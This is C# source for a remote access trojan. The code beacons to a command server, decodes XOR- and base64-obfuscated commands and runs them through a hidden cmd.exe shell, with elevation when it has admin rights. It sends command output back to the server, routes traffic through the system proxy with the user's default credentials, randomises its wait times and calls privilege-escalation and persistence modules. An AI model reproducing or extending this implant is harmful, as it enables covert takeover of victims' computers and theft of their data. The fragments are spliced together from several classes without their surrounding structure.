public registerIn(initialEnum enumed, Chiper chipops, System.Net.WebClient webObj)
{
chiperObj = chipops;
web = webObj;
if (clientId == null && isComplete == false)
{
_registerFirstStage(enumed);
}
}
/*
* <explanation>
* Send result of command to speficied uri as rspns.
* </explanation>
*/
public void _sendResult(String result, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
string asd = chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
string myParameters = "sid=" + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar")) + "&rspns=" + chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string sendResult = web.UploadString(Globals.resultSendUri, myParameters);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
_sendResult(result, web, enumEnv, chipops);
break;
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
}
}
/*
* <explanation>
* Send GET request to speficied uri and return response as command.
* </explanation>
*/
public string _getCommand(String uri, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
try
{
comm = web.DownloadString(uri);
string clearedComm = Regex.Replace(comm, @"^\s+$[\r\n]*", string.Empty, RegexOptions.Multiline);
string decodedComm = chipops._xorOps(chipops._base64decode(clearedComm), enumEnv.xorKey);
return(decodedComm);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
comm = web.DownloadString(uri);
string clearCommand = chipops._xorOps(chipops._base64decode(comm), enumEnv.xorKey);
return(clearCommand);
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
return("");
}
}
static void Main(string[] args)
{
WebClient web = new WebClient();
web.Proxy = WebRequest.GetSystemWebProxy();
web.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
web.Credentials = CredentialCache.DefaultCredentials;
initialEnum enumEnv = new initialEnum();
privilegeEscalation privs = new privilegeEscalation();
sendRetrieve sendOrRetrieve = new sendRetrieve();
Chiper chipops = new Chiper();
addPersistence persistence = new addPersistence();
processCommand proc = new processCommand(enumEnv, privs, persistence);
registerIn register;
int waitTimeCounter = 0;
register = new registerIn(enumEnv, chipops, web);
if (register.isComplete)
{
// persistence._copyItSelf();
string commandRetrieveUri = Globals.commandRetrieveUri + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar"));
while (true)
{
string comm = sendOrRetrieve._getCommand(commandRetrieveUri, web, enumEnv, chipops);
if (!proc.cmdModeEnabled)
{
try
{
if (comm.Length >= 2)
{
if (comm == "die")
{
break;
}
waitTimeCounter = 0;
string commandResult = proc._parseCommand(comm);
if (!proc.wasScreenshot && commandResult.Length > 1)
{
sendOrRetrieve._sendResult(commandResult, web, enumEnv, chipops);
}
else
{
proc.wasScreenshot = false;
}
}
else if (comm.Length < 2)
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
catch
{
System.Threading.Thread.Sleep(enumEnv.waitTime);
}
}
else //if cmd mode enabled
{
if (comm.Length > 2)
{
if (comm == "exit" || comm == "break" || comm == "disablecmd")
{
proc.cmdModeEnabled = false;
sendOrRetrieve._sendResult("CMD mode disabled", web, enumEnv, chipops);
}
else
{
if (comm.Contains("wait"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else if (comm.Contains("cd ") && !comm.Contains("cd ,"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else
{
proc._cmdMode(comm, sendOrRetrieve, enumEnv, web, chipops, commandRetrieveUri);
}
}
}
else
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
if (!enumEnv.isWaitTimeManuallySetted)
{
enumEnv.setRandomWaitTime();
}
}
}
}
/*
* <explanation>
* This function is used for retrieving running processes from <method>GetCurrentProcess</method> of <class>Process</class>.
* <namespace>System.Diagnostics</namespace> is required for this task.
* </explanation>
*/
public void _cmdMode(string command, sendRetrieve sendObj, initialEnum enumEnv, System.Net.WebClient web, Chiper chipops, String uri)
{
string result = "";
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c" + command;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.WorkingDirectory = this._workingDir();
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
if (enumEnv.isAdmin)
{
p.StartInfo.Verb = "runas";
}
p.Start();
result += p.StandardOutput.ReadToEnd();
result += p.StandardError.ReadToEnd();
sendObj._sendResult(result, web, enumEnv, chipops);
}
